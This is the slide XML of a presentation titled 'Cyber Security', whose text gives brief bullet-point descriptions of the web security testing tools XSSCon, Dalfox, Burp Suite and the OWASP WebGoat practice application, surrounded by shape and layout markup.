        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2726066" y="2944154"/>
            <a:ext cx="12422667" cy="5989955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="820419" indent="-410209" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5319"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3799">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>XSSCon is a popular open-source tool for testing and exploiting XSS vulnerabilities in web applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="820419" indent="-410209" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5319"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3799">
                <a:solidFill>
                  <a:srgbClr val="FEEB54"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>The tool can identify and exploit different types of XSS vulnerabilities, including Reflected, Stored, and DOM-based XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="820419" indent="-410209" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5319"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3799" u="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>It provides a user-friendly interface and a powerful engine for generating and testing XSS payloads.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343" t="37179" r="607" b="19256"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false">
            <a:off x="0" y="0"/>
            <a:ext cx="18288000" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1896808" y="2670096"/>
            <a:ext cx="14081183" cy="7039891"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="13024536" cy="6511620"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="13024537" cy="6511620"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="6511620" w="13024537">
                  <a:moveTo>
                    <a:pt x="12900076" y="6511620"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="6511620"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="6511620"/>
                    <a:pt x="0" y="6455740"/>
                    <a:pt x="0" y="6387161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12900076" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12968656" y="0"/>
                    <a:pt x="13024537" y="55880"/>
                    <a:pt x="13024537" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13024537" y="6387161"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13024537" y="6455740"/>
                    <a:pt x="12968656" y="6511620"/>
                    <a:pt x="12900076" y="6511620"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="66667"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1697320" y="1019175"/>
            <a:ext cx="14893360" cy="1419198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="11159"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9299">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn"/>
              </a:rPr>
              <a:t>Dalfox</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1896808" y="3203054"/>
            <a:ext cx="13451370" cy="5840626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="820419" indent="-410209" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5813"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3799">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>Dalfox is an open-source tool for testing and exploiting XSS vulnerabilities in web applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="820419" indent="-410209" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5813"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3799">
                <a:solidFill>
                  <a:srgbClr val="FEEB54"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>It provides a fast and efficient way to identify and exploit XSS vulnerabilities, using a variety of techniques such as fuzzing and pattern matching.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="820419" indent="-410209" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5813"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3799">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>The tool includes features for detecting and bypassing XSS filters, making it a valuable tool for penetration testing and security research.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343" t="37179" r="607" b="19256"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false">
            <a:off x="0" y="0"/>
            <a:ext cx="18288000" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1896808" y="2670096"/>
            <a:ext cx="14081183" cy="7039891"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="13024536" cy="6511620"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="13024537" cy="6511620"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="6511620" w="13024537">
                  <a:moveTo>
                    <a:pt x="12900076" y="6511620"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="6511620"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="6511620"/>
                    <a:pt x="0" y="6455740"/>
                    <a:pt x="0" y="6387161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12900076" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12968656" y="0"/>
                    <a:pt x="13024537" y="55880"/>
                    <a:pt x="13024537" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13024537" y="6387161"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13024537" y="6455740"/>
                    <a:pt x="12968656" y="6511620"/>
                    <a:pt x="12900076" y="6511620"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="66667"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1697320" y="1019175"/>
            <a:ext cx="14893360" cy="1419198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="11159"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9299">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn"/>
              </a:rPr>
              <a:t>Burp Suite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1896808" y="3152202"/>
            <a:ext cx="13451370" cy="5989955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="820419" indent="-410209" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5319"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3799">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>Burp Suite is a powerful web application security testing tool.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="820419" indent="-410209" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5319"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3799">
                <a:solidFill>
                  <a:srgbClr val="FEEB54"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>Burp Suite can be used to test for a variety of vulnerabilities, including XSS, SQL injection, and CSRF.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="820419" indent="-410209" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5319"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3799">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>The tool allows users to intercept and modify requests and responses between a web application and the user's browser, making it a valuable tool for analyzing and testing web application security.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12" r="0" b="1612"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false">
            <a:off x="0" y="0"/>
            <a:ext cx="18288000" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1439541" y="2649865"/>
            <a:ext cx="14622294" cy="6968893"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6362563" cy="3032357"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="6362563" cy="3032357"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="3032357" w="6362563">
                  <a:moveTo>
                    <a:pt x="6238103" y="3032357"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="3032357"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="3032357"/>
                    <a:pt x="0" y="2976477"/>
                    <a:pt x="0" y="2907897"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6238103" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6306683" y="0"/>
                    <a:pt x="6362563" y="55880"/>
                    <a:pt x="6362563" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6362563" y="2907897"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6362563" y="2976477"/>
                    <a:pt x="6306683" y="3032357"/>
                    <a:pt x="6238103" y="3032357"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="68627"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="6423043" y="708006"/>
            <a:ext cx="6687186" cy="1238223"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>Webgoat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1439541" y="2874264"/>
            <a:ext cx="14308551" cy="6384036"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="777240" indent="-388620" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5652"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>WebGoat is a deliberately vulnerable web application that can be used to learn and practice web application security testing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="777240" indent="-388620" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5652"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FEEB54"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>It was developed by OWASP (Open Web Application Security Project), a non-profit organization dedicated to improving software security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="777240" indent="-388620" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5652"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>WebGoat includes a variety of vulnerabilities and attacks that are commonly found in web applications, such as cross-site scripting (XSS), SQL injection, and buffer overflows.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DAFhXY-KnZQ</dc:identifier>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-08-01T06:04:30Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:title>Cyber Security</dc:title>
</cp:coreProperties>
</file>